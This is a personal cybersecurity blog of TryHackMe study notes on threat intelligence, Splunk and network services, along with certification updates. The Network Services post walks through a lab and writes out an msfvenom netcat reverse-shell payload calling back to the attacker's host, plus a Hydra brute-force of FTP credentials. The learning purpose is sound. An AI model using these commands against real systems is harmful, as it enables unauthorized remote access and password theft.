Logan Lupeamanu

Home

  • Intro to Cyber Threat Intel

    https://tryhackme.com/room/cyberthreatintel

    The learning objectives of this room are as follows:

    • The basics of CTI (Cyber Threat Intelligence) and its various classifications
    • The lifecycle followed to deploy and use intelligence during threat investigations
    • Frameworks and standards used in distributing intelligence

    Cyber Threat Intelligence

    CTI is defined as evidence-based knowledge about adversaries, including their indicators, tactics, motivations, and actionable advice against them. This information can be used in order to protect critical assets and inform teams and management business decisions.

    The terms “data”, “information”, and “intelligence” are often used interchangeably, however, let us distinguish between them:

    • Data: Discrete indicators, such as IP addresses, URLs, or hashes
    • Information: A combination of data points that answer a question
    • Intelligence: The correlation of data and information to gather patterns based on contextual analysis

    One of the primary goals of CTI is to understand the relationship between your operational environment and your adversary and how to defend your environment against attacks. Common questions used in order to help meet this goal include:

    • Who’s attacking you?
    • What are their motivations?
    • What are their capabilities?
    • What artifacts and indicators of compromise should you look for?

    Knowing these questions, intelligence is gathered from different sources under the following categories:

    • Internal:
      • Corporate security events such as vulnerability assessments and incident response reports
      • Cyber awareness training reports
      • System log and events
    • Community
      • Open web forums
      • Dark web communities for cybercriminals
    • External
      • Threat intel feeds (commercial and open-source)
      • Online marketplaces
      • Public sources including government data, publications, social media, financial and industrial assessments

    Threat Intelligence Classifications

    • Strategic Intel: High-level intel that looks into the organization’s threat landscape and maps out the risk areas based on trends, patterns, and emerging threats that may impact business decisions
    • Technical Intel: Evidence and artifacts of attack used by an adversary
    • Tactical Intel: Assesses adversary’s tactics, techniques, and procedures (TTPs)
    • Operational Intel: Adversary’s specific motives and intent to perform an attack

    CTI Lifecycle

    The CTI Lifecycle follows a six-phase cycle:

    Direction

    Before starting, every intel program needs to have objectives and goals defined, involving identifying the following parameters:

    • Information assets and business processes that require defending
    • Potential impact to be experienced on losing the assets or through process interruptions
    • Sources of data and intel to be used for protection
    • Tools and resources that are required to defend the assets

    Collection

    Once the objectives have been identified and defined, the process of gathering data in order to address them begins. Analysts use commercial, private, and open-source resources in order to accomplish this. Automation is highly recommended during this process as there is a large volume of data that analysts are faced with.

    Processing

    Once the collection of data is complete, analysts must process the data that was collected. Raw logs, vulnerability information, malware, and network traffic usually come in different formats, so extracting, sorting, and correlating the data with appropriate tags is an important step in being able to properly use collected data.

    Analysis

    Derivation of insights from the information aggregated comes next. Some potential decisions that may be involved in this process include:

    • Investigating a potential threat through uncovering indicators and attack patterns
    • Defining an action plan to avert an attack and defend infrastructure
    • Strengthening security controls or justifying investment for additional resources

    Dissemination

    It’s important to recognize as an analyst that different audiences will require different methods of presenting findings during an investigation. For example, C-suite members will require a concise report covering trends in adversary activities, financial implications, and strategic recommendations. This differs from how an analyst will inform a technical team of the threat IOCs, adversary TTPs, and tactical action plans.

    Feedback

    This final phase covers arguably the most important part. Analysts rely on the responses provided by stakeholders to improve the threat intelligence process and implementation of security controls. Feedback should be made a regular interaction between teams in order to keep the lifecycle working.

    Summary

    As a quick summary of the CTI Lifecycle:

    • Planning and direction -> Collection -> Processing -> Analysis -> Dissemination -> Feedback -> Repeat

  • Splunk 101

    This post follows the Splunk 101 room on Tryhackme. Below are my notes as I progress through the questions.

    Because I have experience navigating through Splunk, a lot of the beginning of this room I went fast through in order to get into more of the juice of the room.

    Splunk Apps

    One of the most important Splunk Apps is the Search & Reporting app provided by default. By editing your “user-prefs.conf”, you can direct Splunk to take you to the search page on login. In order for changes to take place, the “splunkd” service needs to be restarted from the command line using “net stop splunkd” and “net start splunkd”.

    You can find more apps in the “+ Find More Apps” in the apps panel or “Splunk Apps” in the explore Splunk panel.

    In progress.

    ,

  • Network Services

    Please note that this is the first part of my documentation of progressing through Tryhackme’s Cyber Defense Pathway. Below is essentially a collection of my own notes as I go through each section.

    Understanding Telnet

    Picking up at Task 5 of the Network Services lab, we get a refresher on Telnet. Simply, Telnet is an application protocol used to connect and execute commands on remote machines. Because of the lack of security mechanisms, Telnet was eventually replaced with SSH in most implementations, so I best remember Telnet as SSH before SSH.

    How does Telnet work?

    Simply using the command “telnet <ip> <port>” allows you to connect to a Telnet server. From which you can administer any commands you wish on that machine.

    Enumerating Telnet

    Now that we know a bit about Telnet, we can dive into the fun part of enumerating Telnet.

    Spinning up the Tryhackme machine and scanning for open ports using nmap, we find that there is only 1 open port: 8012/tcp. As instructed, rerunning nmap without any tags results in 0 open ports.

    Taking a look at our original scan results, we see that the title is “SKIDY’S BACKDOOR”, providing us with the answers to the next two questions: what could the port be used for and who does it belong to?

    Exploiting Telnet

    Now that we’ve successfully completed enumeration, we can move on to learning how to exploit Telnet.

    From out enumeration, we know that the service itself is marked as a backdoor and we have a possible username (skidy).

    Using this information, we shall try and connect to the telnet port using the command:

    telnet 10.10.76.89 8012

    Now when we try to enter any commands, it seems like we don’t get any return. Let’s check to see if what we’re typing is being executed as a system command. We can do this by starting up a tcpdump listener on our machine that specifically listsens for ICMP traffic.

    Attempting to ping our THM machine from the telnet session, we see that we did receive the ping.

    Now that we know we can communicate between machines, let us craft an exploit in order to generate a reverse shell. We do this by running the command:

    msfvenom -p cmd/unix/reverse_netcat lhost=172.25.53.155 lport=4444 R

    Copy and pasting this payload into our telnet server, our netcat session will respond, allowing us to print out the contents of flag.txt and get our flag!

    Understanding FTP

    Transitioning from Telnet to FTP, it again begins with a brief refresher on what FTP is. FTP (File Transfer Protocol), is exactly as the name suggests. It is a protocol allowing the remote transfer of files over a network. FTP uses a client-server model.

    How does FTP work?

    Typically, FTP sessions operate using two channels: a command channel and a data channel. The command channel is used in order to transmit commands as well as replies to the commands, while the data channel is used for transferring data.

    Clients initiate a connection with the server and the server validates login credentials provided and then opens the session.

    There are two types of connections an FTP server may support:

    • Active: The client opens a port and listens. The server is required to actively connect to it.
    • Passive: The server opens a port and listens and the client connects to it.

    Enumerating FTP

    Jumping into enumerating FTP, we fire up out THM machine and start up an nmap scan on the machine’s IP.

    We can see that there are 2 open ports and FTP is running on port 21 as normal.

    THM asks us what variant of FTP is running on the machine and to do this we again use nmap but with the “-sV” tag as well as the “-p 21” option to make our scan run faster.

    From this we find that the version is vsftpd. Now that we know what we’re dealing with, we should probably check if we are able to login anonymously into the ftp server.

    Alas, we are able to login anonymously. Using the “ls” command, we are able to see the contents of the anonymous FTP directory.

    In order to read PUBLIC_NOTICE.txt, we transfer it to our local machine with “get PUBLIC_NOTICE.txt”. Once on our local machine, we can cat the contents and get the name Mike, which could be a possible username.

    Exploiting FTP

    Now that we have completed out enumeration of the FTP server, we have found a potential username: Mike. Using this information, our method is going to be very simple, we are going to try and bruteforce Mike’s password using Hydra.

    The hydra command we are going to use is as follows:

    hydra -t 4 -l Mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.69.238 ftp

    Quickly we find that mike’s password is password, how secure! Using this password to log into mike’s FTP directory and download a “ftp.txt”

    Now that we have the flag, we are done with Network Services! Onto Network Services 2!

    ,

  • CySA+ Progress

    As my internship has ended a few weeks ago now, my progress on obtaining my CySA+ has diminished slightly. As I pursue new opportunities, my drive to get this certification done has never been higher. I would like to approximate that by October 15th 2022, I should have passed the exam.

    As for my comfort level with the information I am learning, most of it is becoming like a review thanks to previous experiences and going through my review book and videos several times. Having a large amount of free time has also been a help in pushing me to learn more everyday.

    This is a small update for today, but I am planning to create more in depth posts regarding the specifics of my studies, hopefully allowing others to learn from how I chose to approach this certification!

    ,

  • Passed Security+!

    Yesterday (July 12 2022), I took and passed CompTIA Security+ on my first go! It has been such a fun ride, but finally being able to pass this test feels like such a huge weight off of my shoulders. Below I will go more into depth about my preparation, thoughts on the exam, and then some plans going forward.

    My Sec+ Prep

    I have been eyeing Sec+ since October 2021, when I was first getting into cybersecurity. My preparation from October 2021 to ~April 2022 was relatively passive learning from an internship experience I was completing while still in school. A large bulk of my preparation was completed during this summer (2022) during my current internship.

    I used a few resources including:

    • Coursera
    • Udemy (course and Dion’s practice tests – these are a GAMECHANGER)
    • Internship experience
    • Blogs/CompTIA reddit

    Thoughts on the Exam

    To be honest, I did not do as well as I had hoped (a pass is a pass though). There were plenty of questions where I was unsure of the answer and was only able to eliminate one answer as a possibility. Among such questions, the practical questions proved to be especially difficult for me. I am not sure if this is because I had difficulty understanding what they were asking for or if I just was completely unaware of the content. Overall thought, I thought I felt as though I was absolutely bombing it, but when it came time to see my score, I was pleasantly surprised to see I had passed.

    Plans Moving Forward

    After completing Sec+, my drive for more certifications is stronger than ever. I am particularly eyeing CompTIA CySA+ as I want to pursue more of an analyst career in the cyber world. CySA+ as well as CISSP are both on my list of next to get. Other than certifications, I plan to start my B.S. Cybersecurity and Information Assurance at WGU in September, transferring in 2 previous years of university as well as my newfound Security+ certification.

  • Updates up until now

    Hi and welcome! I recently decided it’d be a good idea to start blogging my learning and experiences in the world of cybersecurity. With that in mind, I believe it would be also good to provide information on where I am in my journey at the current moment to help provide context.

    Who am I?

    My name is Logan Lupeamanu and I am an entry level cyber professional. I am currently getting a B.S. – Cybersecurity and Information Assurance from WGU. I have a little bit of a computer science and programming background so that has helped me jump start my learning a little bit. I currently work for an energy company in central Texas as a Cybersecurity Intern II. My main roles currently consist of level 1 incident response tickets including phishing analysis among other things.

    What am I currently working on?

    In terms of learning, I am currently working on getting my CompTIA Security+ certification. I hope to take that test here in the next week (sometime around July 12 2022). I am also working through a few courses on Coursera. I just finished Palo Alto’s professional certificate courses and I am currently working through IBM’s courses.

    My goals

    My goal for these blogs is to showcase what I am learning as well as my passion for cybersecurity to potential future employers. On top of that, I hope that participating in these blogs helps me to solidify my learning by forcing myself to actually understand the content enough to hopefully teach it here and thoroughly walk through what I am learning.

    ,